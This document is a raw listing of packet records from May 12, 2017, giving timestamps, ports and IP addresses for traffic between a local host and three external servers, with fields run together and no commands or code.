May 12, 2017 18:54:52.202693939 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202698946 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202704906 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202874899 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.202898026 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202909946 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202919006 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202927113 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202934980 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202943087 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202950954 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202959061 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202966928 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202975035 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202982903 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202991009 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202996969 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203001976 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203007936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203013897 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203018904 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203023911 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203030109 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203035116 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203039885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203747034 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.203938007 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.208044052 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.208075047 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.208086014 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.208120108 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.208251953 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.244453907 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.244584084 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.244606972 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.371630907 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:52.420449972 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.572491884 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:52.572593927 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:52.636455059 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.636744022 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.658694029 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:52.658719063 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:52.658848047 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:53.068454981 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:53.068562031 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.667990923 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.668030977 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668047905 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668056011 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668073893 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668081999 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668095112 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668102026 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668112993 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668119907 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668131113 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668278933 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.668304920 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668318987 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668332100 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668344021 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668354988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668365955 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668378115 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668389082 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668396950 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668406010 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668411970 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668420076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668426037 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668441057 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668453932 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668458939 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668462992 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668471098 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668478012 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668487072 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670233011 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.670258999 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.670377970 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.670397997 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670408964 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670420885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670434952 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670447111 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670460939 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670466900 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670475006 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670480967 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670506001 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670531988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670547009 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670572996 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.670586109 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.670663118 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.670675039 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.670766115 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:54.670778990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:54.670874119 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.671247005 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.671267033 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.671408892 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.671423912 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.671498060 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.671509027 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.672553062 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.672569990 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.672910929 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.672935009 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.673059940 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.673074007 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.673131943 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.673142910 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.677244902 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.677262068 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.677361012 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.677373886 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.677434921 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.677444935 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.678097963 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.678117990 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.678400993 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.678416014 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.678513050 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.678524971 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.678585052 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.678596020 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.678838968 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.678848982 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679143906 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.679168940 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.679287910 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.679301023 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.679511070 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.679524899 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679536104 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679543018 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679548979 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679555893 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679562092 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679569006 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679574966 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679580927 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679588079 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679594994 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679600954 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679606915 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679613113 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679620028 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679625988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679631948 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679639101 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679646969 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679652929 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679658890 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679811001 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.679831028 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679841042 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679847002 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679852962 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679860115 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679866076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679872990 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679878950 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679886103 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679949045 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679975986 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679995060 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680010080 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680022955 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680037022 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680047989 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680061102 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680074930 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680085897 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680099010 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680111885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.681442976 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.681459904 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.681596041 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.681613922 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.681623936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.681632996 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.681853056 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.682534933 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.682614088 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.684576988 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.685017109 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.685036898 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.732307911 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.732333899 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.732352018 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.732714891 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.741570950 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.741596937 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.741606951 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.741731882 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.743576050 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.743606091 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.743622065 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.743709087 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.749336004 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.749363899 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.749700069 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.749718904 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.750797033 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.750821114 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.750920057 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.750935078 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.759996891 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.760011911 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.760210037 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.760237932 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.772469997 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.772494078 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.772598028 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.772613049 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.772627115 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.773003101 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.773026943 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.786807060 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.786824942 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.786837101 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.787076950 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.787102938 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.795414925 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.795447111 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.795591116 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.795614958 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.802195072 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.802229881 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.802303076 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.802323103 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.811480999 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.811511040 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.811806917 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.811826944 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820218086 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820238113 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820327044 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.820349932 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820655107 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820668936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820871115 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.820890903 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.833436012 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.833456039 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.833730936 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.833754063 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.836469889 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.836484909 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.838824034 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.838852882 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.842475891 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.846822023 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.846853971 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.847103119 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.847136021 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.855978012 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.856013060 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.856136084 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.856184006 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874495029 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874526024 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874675035 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874692917 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874705076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874903917 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.874933958 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.901935101 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.901967049 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.901984930 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.902085066 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.902111053 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.903139114 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.903166056 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.903306007 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.903326988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.912405968 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.912467957 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.912533998 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.912554026 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.912992954 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.913070917 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.928857088 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.928884983 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.928898096 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.928967953 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.934266090 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.934292078 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.934304953 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.934585094 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.936000109 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.936023951 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.936045885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.936275959 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.946844101 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.946866035 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.946882010 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.946937084 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.962415934 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.962451935 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.962807894 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.962830067 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.965831995 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.965873957 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.965944052 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.965961933 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.970786095 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.970807076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.971205950 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.971223116 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.975680113 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.975706100 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.975774050 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.975795031 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.992410898 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.992424965 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.992585897 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.992607117 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.993674994 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.993694067 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.993808031 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.993830919 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.001848936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.001873970 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.001981020 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.002002001 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.007855892 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.007880926 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.007972002 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.007992983 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.011805058 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.011828899 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.011899948 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.011919975 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.026295900 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.026323080 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.026343107 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.026431084 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.026453018 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.029561043 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.029584885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.029705048 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.029725075 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.038958073 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.038981915 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.039066076 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.039088011 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.042819023 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.046211004 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.046235085 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.046390057 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.046405077 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.048495054 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.048521996 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.048744917 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.048758030 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.061341047 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.061367035 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.061470032 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.061485052 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.137875080 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.137900114 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.137913942 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.137942076 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:55.138005018 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.142318010 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142349005 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142362118 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142469883 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.142472982 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142488003 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142503977 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142587900 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142782927 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142801046 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142878056 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.142895937 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142913103 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142935991 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.144529104 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.144546032 CEST909049200138.68.0.4192.168.1.16
